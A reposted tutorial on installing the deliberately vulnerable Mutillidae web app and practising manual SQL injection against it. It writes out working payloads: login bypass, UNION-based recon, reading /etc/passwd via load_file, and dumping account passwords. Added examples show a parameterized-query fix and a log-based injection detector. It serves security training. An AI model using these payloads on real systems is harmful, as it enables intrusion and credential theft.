Mutillidae setup


    SETTING UP MUTILLIDAE IN UBUNTU, BACKTRACK, BACKBOX, ETC. + MANUAL SQL INJECTION

    Mutillidae

    Mutillidae is a free and open source web application for practising website penetration testing and hacking, developed by Adrian “Irongeek” Crenshaw and Jeremy “webpwnized” Druin. It is deliberately vulnerable and exploitable, which makes it ideal for practising your web fu skills such as SQL injection, cross site scripting, HTML injection, JavaScript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more, based on the OWASP (Open Web Application Security Project) Top 10 web vulnerabilities:

    A1-Injection

    A2-Cross Site Scripting (XSS)

    A3-Broken Authentication and Session Management

    A4-Insecure Direct Object References

    A5-Cross Site Request Forgery (CSRF)

    A6-Security Misconfiguration

    A7-Insecure Cryptographic Storage

    A8-Failure to Restrict URL Access

    A9-Insufficient Transport Layer Protection

    A10-Unvalidated Redirects and Forwards

    – ** –

    Before we can install Mutillidae, we need to configure our LAMP (Linux, Apache, MySQL, PHP/Python/Perl) server. First we need to install Apache; type this in your terminal:

    [screenshot: LAMP server]

    sudo apt-get install apache2

    Then install PHP:

    sudo apt-get install php5 libapache2-mod-php5

    Install the MySQL server:

    sudo apt-get install mysql-server

    After that it should prompt you to set up the password for your MySQL server. In my case, I put ‘mysqlroot’ as my password just for demo purposes really, although it’s not really advisable to use a weak password on a live server.

    Now set up phpMyAdmin (optional):

    sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

    Change the permissions of your /var/www folder so that you have read, write and execute rights on its files (world-writable permissions are fine for a throwaway lab box, not for anything exposed), by typing this command in your terminal:

    sudo chmod -R 0777 /var/www

    To check that the installation succeeded, open http://localhost/ or http://127.0.0.1/ in your browser.

    If you see a page that says ‘It Works!’ then you are done setting up your LAMP server. Now it is time to install Mutillidae! Download and extract Mutillidae into the /var/www directory:

    sudo -s

    cd /var/www

    wget http://www.irongeek.com/mutillidae/mutillidae1.5.zip

    unzip mutillidae1.5.zip

    Next we need to edit config.inc, which contains the dbhost, dbuser, dbpass and dbname settings:

    cd mutillidae

    gedit config.inc

    By default the value of $dbpass is left blank, so we need to put in the MySQL root password you entered during the installation of mysql-server. In my case I put mysqlroot.

    [screenshot: PHP configuration]

    Make sure the MySQL and Apache services are already running; if not, start them with these commands in the terminal:

    service mysql start

    service apache2 start

    Then open your web browser again and point it to 127.0.0.1/mutillidae/ or localhost/mutillidae/. Next, let’s have the web application set up the database automatically by clicking Core Controls > Setup/Reset the DB on the left side, or Setup/Reset the DB in the upper right corner.

    [screenshot: DB setup]

    The link should take you to 127.0.0.1/mutillidae/set-up-database.php.

    [screenshot: database config]

    If you see no errors then you are ready to play with Mutillidae. =)


    MANUAL SQL INJECTION

    Now time for some action! \m/

    For me, the best way to understand and learn SQL (Structured Query Language) injection, if you are into web application penetration testing, is to learn it manually rather than using automated tools, and to set up an open source web application that is vulnerable. I don’t discourage using tools for automation, since tools can also be of great help. My only point is that we should at least get familiar with the use of SQL statements for attacking a web application.

    To tell you honestly, I learned manual SQL injection with the help of a mentor without any knowledge of SQL and PHP; and when I later had a formal class at college on SQL, database management and PHP, I was able to apply it and enjoyed it. So thank you, mentor (you know who you are).

    Simple Bypass Authentication

    This is one of the pages where you can practice SQL Injection. Yeah, a login form:

    [screenshot: login form injection]

    Let’s try entering a ' (single quote) to see whether we can cause an error and how the web application reacts.

    [screenshot: SQL error]

    As we can see from the image above, the actual SQL query is SELECT * FROM accounts WHERE username='' AND password=''. If that is the case, we can attack this application with a simple authentication bypass, such as entering ' or '1'='1 in the password field. This makes the WHERE clause match even without a valid password, because '1'='1' always evaluates to true. The query returns every column of the accounts table because it says SELECT * FROM accounts.

    [screenshot: passwords]
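The defect behind that bypass, and its fix, as an added example that is not part of the original post: a string-built login query mirroring the one the error page revealed, beside the same query with bound parameters. It uses an in-memory SQLite table standing in for Mutillidae's accounts table; the rows and column names are constructed for the demo.

```python
import sqlite3

# Constructed stand-in for Mutillidae's four-column accounts table;
# the rows below are made up for the demo.
SCHEMA = """
CREATE TABLE accounts (cid INTEGER PRIMARY KEY, username TEXT,
                       password TEXT, mysignature TEXT);
INSERT INTO accounts VALUES (1, 'admin', 'adminpass', 'Monkey!');
INSERT INTO accounts VALUES (2, 'adrian', 'somepassword', 'Zombie Films Rock!');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    # Mirrors the query shown in the error message: user input is glued
    # straight into the SQL text, so quotes in the input rewrite the query.
    query = ("SELECT * FROM accounts WHERE username='%s' AND password='%s'"
             % (username, password))
    return conn.execute(query).fetchall()


def login_parameterized(conn, username, password):
    # Same query with bound parameters: the values are never parsed as SQL,
    # so ' or '1'='1 is compared literally against the stored password.
    query = "SELECT * FROM accounts WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


def demo():
    """Row counts returned for the bypass payload and for a real login."""
    conn = open_db()
    bypass = "' or '1'='1"
    return {
        "vulnerable_rows": len(login_vulnerable(conn, "", bypass)),
        "parameterized_rows": len(login_parameterized(conn, "", bypass)),
        "legit_rows": len(login_parameterized(conn, "admin", "adminpass")),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable version returns every account for the bypass payload; the parameterized one returns none, while a genuine username and password still match exactly one row.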

    Finding the number of columns

    To find the number of columns we use ORDER BY and increment the number by 1 until the site returns an error. We put a comment character (#) at the end, or you may use the comment sequence -- instead. Enter these in the login form (either the username or the password field works):

    ' order by 1 #

    ' order by 2 #

    ' order by 3 #

    ' order by 4 #

    Because ' order by 5 # returns an error, the query has four columns: ordering by the 5th column fails because no such column exists.

    [screenshot: unknown column error]

    Union Select 101

    Now we can use a UNION SELECT statement for information gathering and recon.

    ' union select 1,2,3,4 #

    [screenshot: union select]

    From the image above, you can see that the page looks a bit messed up and that three of the numbers appear on it. These are the column positions whose values the page renders, so they are the positions we can pull information through; we will replace them with expressions later on. In fact you can simply replace any of the three numbers that show up on the page with the value you want rendered. For example:

    ' union select 1,2,'shipcode was here',4 #

    [screenshot: MySQL injection]

    Finding the MySQL version

    To determine the MySQL version, use @@version or version() in a column position that is shown on the page. For example, if I choose the third, the statement is:

    ' union select 1,2,@@version,4 #

    [screenshot: MySQL version]

    Finding the location of the database directory

    We use @@datadir instead of @@version:

    ' union select 1,2,@@datadir,4 #

    Result:

    Username=/var/lib/mysql/
    Password=3
    Signature=4

    Finding the current database user

    ' union select 1,system_user(),3,4 #

    or

    ' union select 1,user(),3,4 #

    Result:

    Username=root@localhost
    Password=3
    Signature=4

    Using LOAD_FILE for directory traversal

    MySQL LOAD_FILE() reads a file on the database server and returns its contents as a string. It only works when the database user holds the FILE privilege (the root account this setup connects with has it) and the path is permitted by secure_file_priv, which is one reason a web application should never connect as root.

    ' union select 1,load_file('/etc/passwd'),3,4 #

    This lets an attacker gather information about the system's directories and users, and if they can read /etc/shadow as well, it becomes possible to crack the password hashes stored there.

    [screenshot: directory traversal]

    Finding the table names

    If the MySQL version is below 5 (4.x, 3.x, etc.) there is no information_schema, so column and table names usually have to be guessed; the most common table names include user/s, admin/s and member/s. On MySQL 5 and later you can list the table names directly by injecting this:

    ' union select 1,2,concat(table_name),4 from information_schema.tables where table_schema=database() #

    [screenshot: table_name]

    The query above shows only the tables of this web application's database, owasp10, because of the WHERE clause where table_schema=database(). Without the WHERE clause it would also list the tables of every other database on the server.

    Finding the columns

    Obviously the accounts table is the one we want information from. The next step is to find the columns, which works just like listing the table names: change table_name to column_name and information_schema.tables to information_schema.columns, so the statement becomes:

    ' union select 1,2,concat(column_name),4 from information_schema.columns where table_schema=database() #

    [screenshot: column_name]

    Pwning the usernames and passwords in the web application's database

    Now that we have the table names and column names, we can put them together and pull data out. We use the same UNION technique to select the username and password columns from the accounts table, so the statement below lets an attacker dump every account's username and password, admin's included:

    ' union select 1,username,password,4 from accounts #

    [screenshot: dump SQL]

    Now we got the usernames and passwords =)
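From the defender's side, the probe sequence walked through above (ORDER BY column counting, UNION SELECT, @@version/@@datadir, LOAD_FILE, information_schema enumeration, trailing comment markers) leaves a recognisable trail in web server logs. The detector below is an added example, not part of the original post or of Mutillidae; its Apache log lines are constructed and assume the injected fields arrive in the query string (for a POST form you would feed it the request body from a ModSecurity audit log instead).

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probes used in the post, matched against the
# URL-decoded, lower-cased value of each request parameter.
SIGNATURES = {
    "column_probe": re.compile(r"'\s*order\s+by\s+\d+"),
    "union_select": re.compile(r"union\s+(all\s+)?select\b"),
    "server_vars":  re.compile(r"@@(version|datadir)|\b(version|user|system_user)\(\)"),
    "file_read":    re.compile(r"\bload_file\s*\("),
    "schema_enum":  re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "comment_tail": re.compile(r"(#|--\s)\s*$"),
}

# Constructed Apache combined-log lines (not real traffic): one benign login
# followed by three of the post's probes, URL-encoded as GET parameters.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2013:12:00:01 +0800] "GET /mutillidae/index.php?page=login.php&username=admin&password=Monkey%21 HTTP/1.1" 200 5120
10.0.0.5 - - [10/Mar/2013:12:00:09 +0800] "GET /mutillidae/index.php?page=login.php&username=%27+order+by+5+%23&password= HTTP/1.1" 200 4870
10.0.0.5 - - [10/Mar/2013:12:00:20 +0800] "GET /mutillidae/index.php?page=login.php&username=%27+union+select+1%2C2%2C%40%40version%2C4+%23&password= HTTP/1.1" 200 5200
10.0.0.5 - - [10/Mar/2013:12:00:31 +0800] "GET /mutillidae/index.php?page=login.php&username=%27+union+select+1%2Cload_file%28%27%2Fetc%2Fpasswd%27%29%2C3%2C4+%23&password= HTTP/1.1" 200 9001
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_line(line):
    """Return the set of signature names that fire on one log line."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return set()
    hits = set()
    for pair in m.group(1).split("?", 1)[1].split("&"):
        # Decode each parameter value before matching, since the payloads
        # arrive percent-encoded (%27 for the quote, + for spaces).
        value = unquote_plus(pair.partition("=")[2]).lower()
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return hits


def scan_log(text):
    """Map each suspicious line number (1-based) to the signatures it hit."""
    findings = {}
    for number, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings[number] = hits
    return findings
```

Run on the sample, the benign login produces no finding while lines 2 to 4 are flagged with the probe types they contain, which is the shape of an alert a SIEM rule would raise against the same traffic.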

    Original address: https://www.cnblogs.com/vigarbuaa/p/3015041.html